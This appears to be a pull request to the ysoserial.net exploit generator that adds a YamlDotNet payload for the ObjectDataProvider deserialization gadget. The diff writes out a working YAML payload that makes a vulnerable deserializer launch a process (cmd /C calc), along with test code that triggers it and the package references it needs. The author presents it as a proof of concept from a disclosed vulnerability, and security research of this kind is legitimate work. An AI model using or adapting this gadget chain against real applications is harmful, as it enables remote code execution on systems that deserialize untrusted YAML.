### PR TITLE
add YamlDotNet payload generator for ObjectDataProvider

### DIFF
--- a/ysoserial/Generators/ObjectDataProviderGenerator.cs
+++ b/ysoserial/Generators/ObjectDataProviderGenerator.cs
@@ -7,6 +7,7 @@ using Newtonsoft.Json;
 using System.Web.Script.Serialization;
 using System.Xml;
 using System.Xml.Serialization;
+using YamlDotNet.Serialization;
 
 namespace ysoserial.Generators
 {
@@ -216,7 +217,6 @@ namespace ysoserial.Generators
                         {
                             var deserializer = new DeserializerBuilder().Build();
                             var result = deserializer.Deserialize(reader);
-                            Console.WriteLine("YamlDotNet string stream test complete.");
                         }
                     }
                     catch

--- a/ysoserial/Generators/ObjectDataProviderGenerator.cs
+++ b/ysoserial/Generators/ObjectDataProviderGenerator.cs
@@ -19,7 +19,7 @@ namespace ysoserial.Generators
 
         public override List<string> SupportedFormatters()
         {
-            return new List<string> { "Json.Net", "FastJson", "JavaScriptSerializer", "XmlSerializer", "DataContractSerializer" };
+            return new List<string> { "Json.Net", "FastJson", "JavaScriptSerializer", "XmlSerializer", "DataContractSerializer", "YamlDotNet" };
         }
 
         public override string Name()
@@ -185,6 +185,39 @@ namespace ysoserial.Generators
                         XmlElement xmlItem = (XmlElement)xmlDoc.SelectSingleNode("root");
                         var s = new DataContractSerializer(Type.GetType(xmlItem.GetAttribute("type")));
                         var d = s.ReadObject(new XmlTextReader(new StringReader(xmlItem.InnerXml)));
+                    }
+                    catch
+                    {
+                    }
+                }
+                return payload;
+            }
+            else if (formatter.ToLower().Equals("yamldotnet"))
+                {
+                String payload = @"
+!<!System.Windows.Data.ObjectDataProvider%2c%20PresentationFramework%2c%20Version=4.0.0.0%2c%20Culture=neutral%2c%20PublicKeyToken=31bf3856ad364e35> {
+    MethodName: Start,
+	ObjectInstance: 
+		!<!System.Diagnostics.Process%2c%20System%2c%20Version=4.0.0.0%2c%20Culture=neutral%2c%20PublicKeyToken=b77a5c561934e089> {
+			StartInfo:
+				!<!System.Diagnostics.ProcessStartInfo%2c%20System%2c%20Version=4.0.0.0%2c%20Culture=neutral%2c%20PublicKeyToken=b77a5c561934e089> {
+					FileName : cmd,
+					Arguments : '/C calc'
+
+                }
+        }
+}";
+                if (test)
+                {
+                    try
+                    {
+                        //to bypass all of the vulnerable version's type checking, we need to set up a stream
+                        using (var reader = new StreamReader(new MemoryStream(System.Text.Encoding.UTF8.GetBytes(payload))))
+                        {
+                            var deserializer = new DeserializerBuilder().Build();
+                            var result = deserializer.Deserialize(reader);
+                            Console.WriteLine("YamlDotNet string stream test complete.");
+                        }
                     }
                     catch
                     {

--- a/ysoserial/packages.config
+++ b/ysoserial/packages.config
@@ -3,4 +3,5 @@
   <package id="fastJSON" version="2.1.27" targetFramework="net452" />
   <package id="NDesk.Options" version="0.2.1" targetFramework="net452" />
   <package id="Newtonsoft.Json" version="10.0.3" targetFramework="net452" />
+  <package id="YamlDotNet" version="4.3.2" targetFramework="net452" />
 </packages>

--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -62,6 +62,9 @@
     <Reference Include="System.Data" />
     <Reference Include="System.Net.Http" />
     <Reference Include="System.Xml" />
+    <Reference Include="YamlDotNet, Version=0.0.0.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>..\packages\YamlDotNet.4.3.2\lib\net45\YamlDotNet.dll</HintPath>
+    </Reference>
   </ItemGroup>
   <ItemGroup>
     <Compile Include="ExploitClass.cs" />


### PR DESCRIPTION
@pwntester 

Adds functionality for YamlDotNet ObjectDataProvider gadget.  My proof of concept used to report this vulnerability to the maintainer was reading from a stream to bypass all of the expected type checking present.

I tested WindowsIdentity gadget as well, but the vulnerable version(s) of YamlDotNet instantiate the object with Activator.CreateInstance(Type), so the WindowsIdentity gadget is not a viable attack path here.